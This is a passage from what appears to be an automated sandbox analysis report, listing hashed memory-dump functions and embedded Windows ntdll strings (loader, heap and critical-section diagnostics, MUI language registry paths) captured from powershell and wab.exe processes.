                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 02159ce3278ebca7317fed66ee43c2008607b707a840b2013e823c233a63eab7
                                                              • Instruction ID: e41061ca69a7834fd47769be4d44e23770b0d74a127702df127123c5774d1019
                                                              • Opcode Fuzzy Hash: 02159ce3278ebca7317fed66ee43c2008607b707a840b2013e823c233a63eab7
                                                              • Instruction Fuzzy Hash: AFF0B235A001099FDB15CB99D890AEEF7B5FF88324F248199E915A72A1C732E852CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 02B8D8BC Relevance: .1, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927012816.0000000002B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B8D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_2b8d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 608aabc8ec596a22840bd43af5dc227d62de720febfa3cf1fae223bafb51d5b4
                                                              • Instruction ID: 0cc22d827ec66e52db5b2c090f17ba9599f604f0ce01a93999568df022853eb7
                                                              • Opcode Fuzzy Hash: 608aabc8ec596a22840bd43af5dc227d62de720febfa3cf1fae223bafb51d5b4
                                                              • Instruction Fuzzy Hash: C8213AB1604345DFEB04EF24D5C4B26BBA5FBC4624F20C5BEDA4D4B285C336D846CAA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:0%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:40%
                                                              Total number of Nodes:5
                                                              Total number of Limit Nodes:1
                                                              execution_graph 64518 20252c70 LdrInitializeThunk 64520 20252c00 64522 20252c0a 64520->64522 64523 20252c11 64522->64523 64524 20252c1f LdrInitializeThunk 64522->64524

                                                              Executed Functions

                                                              Function 202535C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 6 202535c0-202535cc LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: e0e020dd1d613b9a28af5041b3a0d9843dca016e641e625a7e5d2b08c570a967
                                                              • Instruction ID: a320dac52431b489e5fb305843277ed49682685d537812a3afb331c150b9b0c0
                                                              • Opcode Fuzzy Hash: e0e020dd1d613b9a28af5041b3a0d9843dca016e641e625a7e5d2b08c570a967
                                                              • Instruction Fuzzy Hash: 6D90027160550442D21071D94954706100547D0201F65C513A5424568D87958EA169A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 4 20252c70-20252c7c LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 67e4f21ac3ee76b3512cbe18f6d25499f8657e79a573a51e386f21503072e0f1
                                                              • Instruction ID: 6c485bb639529da7077019a7f804034d8dd853a54ba3b3dfab24340d06ab7f27
                                                              • Opcode Fuzzy Hash: 67e4f21ac3ee76b3512cbe18f6d25499f8657e79a573a51e386f21503072e0f1
                                                              • Instruction Fuzzy Hash: 1E90027120148842D22071D9884474A000547D0301F59C513A9424658D86958DE17521
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 5 20252df0-20252dfc LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6e9e67e549bfdf16720753d82db45e3c67d8330d0e5bc7fc223a26662a80b561
                                                              • Instruction ID: 5709781b7dcb4252800888c63badaf27e3faf2f9260cbffd7ac45fe96776448b
                                                              • Opcode Fuzzy Hash: 6e9e67e549bfdf16720753d82db45e3c67d8330d0e5bc7fc223a26662a80b561
                                                              • Instruction Fuzzy Hash: 8D90027120140453D22171D94944707000947D0241F95C513A5424558D96568EA2A521
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20252C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 20252c0a-20252c0f 1 20252c11-20252c18 0->1 2 20252c1f-20252c26 LdrInitializeThunk 0->2
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 2ad2bb755f93ae71b0b8fd8af817b6ee9c98d161f011630dca1e001bca62c513
                                                              • Instruction ID: d3342303b6f1575627908f5b925efa63ed5aa863e21627c0e20065b2dcf007f3
                                                              • Opcode Fuzzy Hash: 2ad2bb755f93ae71b0b8fd8af817b6ee9c98d161f011630dca1e001bca62c513
                                                              • Instruction Fuzzy Hash: 86B09B719015D5C5D715E7E04E0870B7D0067D1701F16C163D3030645F4738C5E5E575
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 20292349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2160512332
                                                              • Opcode ID: 2e74db1b4be342ee62820899763a50ea34ced717081d99d63d07fe5fd6d14e09
                                                              • Instruction ID: f80089e2630be987c62a0cbdb0d88667832c1df3f88b4532ac1c412e6aada1c2
                                                              • Opcode Fuzzy Hash: 2e74db1b4be342ee62820899763a50ea34ced717081d99d63d07fe5fd6d14e09
                                                              • Instruction Fuzzy Hash: 30928D7160874AABE321CF90CC81F5BB7E9BB84754F20482EFA94D7250D774E958CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20248620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 628 20248620-20248681 629 20248687-20248698 628->629 630 20285297-2028529d 628->630 630->629 631 202852a3-202852b0 GetPEB 630->631 631->629 632 202852b6-202852b9 631->632 633 202852bb-202852c5 632->633 634 202852d6-202852fc call 20252ce0 632->634 633->629 636 202852cb-202852d4 633->636 634->629 639 20285302-20285306 634->639 638 2028532d-20285341 call 202154a0 636->638 644 20285347-20285353 638->644 639->629 641 2028530c-20285321 call 20252ce0 639->641 641->629 648 20285327 641->648 646 20285359-2028536d 644->646 647 2028555c-20285568 call 2028556d 644->647 650 2028538b-20285401 646->650 651 2028536f 646->651 647->629 648->638 655 2028543a-2028543d 650->655 656 20285403-20285435 call 2020fd50 650->656 654 20285371-20285378 651->654 654->650 657 2028537a-2028537c 654->657 659 20285443-20285494 655->659 660 20285514-20285517 655->660 668 2028554d-20285552 call 2029a4b0 656->668 661 2028537e-20285381 657->661 662 20285383-20285385 657->662 669 202854ce-20285512 call 2020fd50 * 2 659->669 670 20285496-202854cc call 2020fd50 659->670 663 20285555-20285557 660->663 664 20285519-20285548 call 2020fd50 660->664 661->654 662->650 662->663 663->644 664->668 668->663 669->668 670->668
                                                              Strings
                                                              • Critical section debug info address, xrefs: 2028541F, 2028552E
                                                              • corrupted critical section, xrefs: 202854C2
                                                              • Critical section address, xrefs: 20285425, 202854BC, 20285534
                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 202854E2
                                                              • Critical section address., xrefs: 20285502
                                                              • Thread identifier, xrefs: 2028553A
                                                              • double initialized or corrupted critical section, xrefs: 20285508
                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 2028540A, 20285496, 20285519
                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 202854CE
                                                              • 8, xrefs: 202852E3
                                                              • undeleted critical section in freed memory, xrefs: 2028542B
                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 20285543
                                                              • Address of the debug info found in the active list., xrefs: 202854AE, 202854FA
                                                              • Invalid debug info address of this critical section, xrefs: 202854B6
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                              • API String ID: 0-2368682639
                                                              • Opcode ID: 41d8023d4297a8a4411add7568aa9eb00de0fda238a8caa52cf449466f082eea
                                                              • Instruction ID: fe2ca3bc1003d3d0c37528762748ba8c2d646ef1a50a0702ff46b62b0fe5a9d4
                                                              • Opcode Fuzzy Hash: 41d8023d4297a8a4411add7568aa9eb00de0fda238a8caa52cf449466f082eea
                                                              • Instruction Fuzzy Hash: 0B81BBB5901369AFDB10CFD5CC84F9EBBBABB08718F21405AF504B7A90D335AA51CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2020D34C Relevance: 12.8, Strings: 10, Instructions: 312COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1369 2020d34c-2020d38d 1370 2020d393-2020d395 1369->1370 1371 2026a90d 1369->1371 1370->1371 1372 2020d39b-2020d39e 1370->1372 1374 2026a917-2026a930 call 202cc188 1371->1374 1372->1371 1373 2020d3a4-2020d3ac 1372->1373 1375 2020d3b6-2020d401 call 20255130 call 20252b90 1373->1375 1376 2020d3ae-2020d3b0 1373->1376 1381 2026a936-2026a939 1374->1381 1382 2020d5ca-2020d5cd 1374->1382 1393 2026a871-2026a88b call 20207270 1375->1393 1394 2020d407-2020d410 1375->1394 1376->1375 1378 2026a867-2026a86c 1376->1378 1384 2020d620-2020d628 1378->1384 1386 2020d5ad-2020d5af 1381->1386 1385 2020d5cf-2020d5d5 1382->1385 1388 2020d69b-2020d69d 1385->1388 1389 2020d5db-2020d5e8 GetPEB call 20223ca0 1385->1389 1386->1382 1391 2020d5b1-2020d5c4 call 20233342 1386->1391 1395 2020d5ed-2020d5f2 1388->1395 1389->1395 1391->1382 1403 2026a93e-2026a943 1391->1403 1414 2026a895-2026a899 1393->1414 1415 2026a88d-2026a88f 1393->1415 1400 2020d412-2020d414 1394->1400 1401 2020d41a-2020d42d call 2020d796 1394->1401 1398 2020d601-2020d606 1395->1398 1399 2020d5f4-2020d5fd call 20252b60 1395->1399 1406 2020d615-2020d61a 1398->1406 1407 2020d608-2020d611 call 20252b60 1398->1407 1399->1398 1400->1401 1405 2026a8a1-2026a8ac call 202cb1e1 1400->1405 1420 2020d433-2020d437 1401->1420 1421 2026a8c9 1401->1421 1403->1382 1405->1401 1423 2026a8b2-2026a8c4 1405->1423 1406->1384 1416 2026a948-2026a94c call 20252b60 1406->1416 1407->1406 1414->1405 1415->1414 1422 2020d58e 1415->1422 1424 2026a951 1416->1424 1426 2020d62b-2020d683 call 20255130 call 20252b90 1420->1426 1427 2020d43d-2020d457 call 2020d930 1420->1427 1429 2026a8d1-2026a8d3 1421->1429 1425 2020d590-2020d595 1422->1425 1423->1401 1424->1424 1430 2020d597-2020d599 1425->1430 1431 2020d5a9 1425->1431 1443 2020d6a2-2020d6a5 1426->1443 1444 2020d685 1426->1444 1427->1429 1437 2020d45d-2020d4ae call 20255130 call 20252b90 1427->1437 1429->1382 1434 2026a8d9 1429->1434 1430->1374 1435 2020d59f-2020d5a3 1430->1435 1431->1386 1441 2026a8de 1434->1441 1435->1374 1435->1431 1437->1421 1449 2020d4b4-2020d4bd 1437->1449 1446 2026a8e8-2026a8ed 1441->1446 1443->1422 1448 2020d68f-2020d696 1444->1448 1446->1388 1448->1425 1449->1441 1450 2020d4c3-2020d4f2 call 20255130 call 2020d6aa 1449->1450 1450->1448 1455 2020d4f8-2020d4fe 1450->1455 1455->1448 1456 2020d504-2020d50a 1455->1456 1456->1388 1457 2020d510-2020d52c GetPEB call 20225e70 1456->1457 1457->1446 1460 2020d532-2020d54f call 2020d6aa 1457->1460 1463 2020d551-2020d556 1460->1463 1464 2020d586-2020d58c 1460->1464 1465 2026a8f2-2026a8f7 1463->1465 1466 2020d55c-2020d584 call 20234d86 1463->1466 1464->1385 1464->1422 1465->1466 1468 2026a8fd-2026a908 1465->1468 1466->1464 1468->1425
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$H/# $MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                              • API String ID: 0-3237199910
                                                              • Opcode ID: 0e26d95e012dd23483dc14ce90e03c38b2189904620ce4475f17a01821f3ebcb
                                                              • Instruction ID: 3e18a315a332c5072bd94e32fb2b9512222c1eb85c4e4f8828d8abe76e351857
                                                              • Opcode Fuzzy Hash: 0e26d95e012dd23483dc14ce90e03c38b2189904620ce4475f17a01821f3ebcb
                                                              • Instruction Fuzzy Hash: B0B1987150A3529BC711CFA4CC80B5BBBE9EB98754F01492FF98897240D735EE988F92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202C12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                              • API String ID: 0-3591852110
                                                              • Opcode ID: 21e184f75484ae825b26ec5a260461df191f065512048226dec3557ba797d62d
                                                              • Instruction ID: 2fc54d0031555c5bb3d88529c8c43509b6237c67d616e80199696fdda0c9332b
                                                              • Opcode Fuzzy Hash: 21e184f75484ae825b26ec5a260461df191f065512048226dec3557ba797d62d
                                                              • Instruction Fuzzy Hash: 0612E330604652DFD725CFA4C882BBABBF6FF26304F16865AE5858B641D334EDA0CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2020D08D Relevance: 11.5, Strings: 9, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • @, xrefs: 2020D0FD
                                                              • H/# , xrefs: 2026A843
                                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 2020D0CF
                                                              • @, xrefs: 2020D313
                                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 2020D196
                                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 2020D146
                                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 2020D262
                                                              • @, xrefs: 2020D2AF
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 2020D2C3
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$H/# $Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                              • API String ID: 0-3532747180
                                                              • Opcode ID: 71a64bd708fa850475e66e079c5c90a2a4ab3e3ea6511d8e738be8552c507137
                                                              • Instruction ID: f6bb744dbb5fbad471e3ed5fc269cf48ce59b0d23f042891ac5f269e7fb95d61
                                                              • Opcode Fuzzy Hash: 71a64bd708fa850475e66e079c5c90a2a4ab3e3ea6511d8e738be8552c507137
                                                              • Instruction Fuzzy Hash: 53A159718093469FD311CFA0C880B5BBBE9FB94719F00492FF98896241D775EA588F93
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202A9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                              • API String ID: 0-3063724069
                                                              • Opcode ID: 8260344c3af594b0f78aca0941b00d49b4ec1590b9ec63f1f05fa476f038e20e
                                                              • Instruction ID: ad4d72b8ebcdcf8c6f5336d6a5932fcb50753d35de17e7aa3f843eb6d7f76a5d
                                                              • Opcode Fuzzy Hash: 8260344c3af594b0f78aca0941b00d49b4ec1590b9ec63f1f05fa476f038e20e
                                                              • Instruction Fuzzy Hash: 7BD1D3B2805315ABD721CFD58C81B6BB7ECAF94B14F01492BFA94A7150DB34DD288B92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202C0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              • API String ID: 0-1700792311
                                                              • Opcode ID: 40bf9e89ab7b7df44531827f3b483354466c0c57f095de6920bacf0c84a7050a
                                                              • Instruction ID: a8a0f16e0eee0be4ee14284e28c50c1d35246cc8161410422c9b7e4dd7792f93
                                                              • Opcode Fuzzy Hash: 40bf9e89ab7b7df44531827f3b483354466c0c57f095de6920bacf0c84a7050a
                                                              • Instruction Fuzzy Hash: 0ED1DE31504686DFCB12CFE4CC81BAABBF6FF59614F06814BE6459B652C739AA60CF10
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2020F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-523794902
                                                              • Opcode ID: 70368c4cd590f3d1b55c612bd09b7e39af33b754bd9a133ce9c2b786bf142f3b
                                                              • Instruction ID: cc115a3894de35350064962869b7f8b105514f46b6f507bd7a220e36ba25d86e
                                                              • Opcode Fuzzy Hash: 70368c4cd590f3d1b55c612bd09b7e39af33b754bd9a133ce9c2b786bf142f3b
                                                              • Instruction Fuzzy Hash: B542E0316187829FC741CFA8CC80B1ABBE6FF94204F14496BF9858B652D734EDA5CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202351EF Relevance: 7.9, Strings: 6, Instructions: 434COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: H/# $Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                              • API String ID: 0-3246750463
                                                              • Opcode ID: ef8e727d883c7df80130d68cba6674e29a6d19f5718589149efd56b745548f1f
                                                              • Instruction ID: 15086d55e40d10ab3ba0643b4d8d84388b86e67dd54d27899f1c9665a5276103
                                                              • Opcode Fuzzy Hash: ef8e727d883c7df80130d68cba6674e29a6d19f5718589149efd56b745548f1f
                                                              • Instruction Fuzzy Hash: B0F12AB2D11629EFCB06CFE8CD81A9EBBBDFF48650F51405BE505A7210D674AE118BA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2022B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
